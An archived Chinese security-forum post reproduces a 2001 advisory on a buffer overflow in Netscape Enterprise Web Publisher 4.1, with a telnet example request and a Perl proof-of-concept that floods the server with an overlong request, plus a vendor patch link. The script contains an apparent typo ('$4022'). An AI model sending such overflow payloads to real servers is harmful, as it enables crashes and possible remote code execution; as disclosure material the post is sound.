精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◆系统漏洞◆>>Netscape Enterprise Web Publisher 缓冲溢出攻击与

主题:Netscape Enterprise Web Publisher 缓冲溢出攻击与
发信人: swak()
整理人: williamlong(2001-07-16 15:09:44), 站内信件
Netscape Enterprise Web Publisher 缓冲溢出
整理:swak
发布日期:11/5/2001
漏洞级别:高(可恶意执行SYSTEM级代码)
受影响系统:Netscape Enterprise 4.1 与早期版本

描述:
NETSCAPE的WEB PUBLISHER功能可被缓冲溢出攻击。通过发送一个包含有可执行代

码的缓冲段及新的重定向指针,攻击者便可获得被攻击主机的SHELL。

缓冲溢出存在于PUBLISHER对URI(统一资源签别)上。通过指定GETPROPERTIES,

GETATTRIBUTENAMES等一些NETSCAPE PUBLISHER特有的方法,便可将代码写入含有

此漏洞的主机。

例子:
C:\>telnet www.example.com 80
Connecting To www.example.com... connected.
GETPROPERTIES /(buffer) HTTP/1.1
Host: Hostname
(enter)
(enter)

此处输入约2000个字符。

攻击代码:仅用于测试,后果自负。



#!/usr/bin/perl
use IO::Socket;
  if (@ARGV < 2) {
print "Usage: host port\n";
exit;
}
#超长字符溢出
$overflow = "A" x $4022;
&connect;
sleep(15);
&connect;
exit;
################################################
sub connect() {
$sock= IO::Socket::INET->new(Proto=>"TCP",
     PeerAddr=>$ARGV[0],
     PeerPort=>"$ARGV[1]",)
     or die "Cant connect to $ARGV[0]: $!\n";
  $sock->autoflush(1);
  print $sock "$overflow /index.html HTTP/1.0\n\n";
  $response=<$sock>;
  print "$response";
  while(<$sock>){
     print "$_\n";
  }
  close $sock;
}

漏洞补丁:

http://iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html

漏洞发布者:
Riley Hassell ([email protected])



[关闭][返回]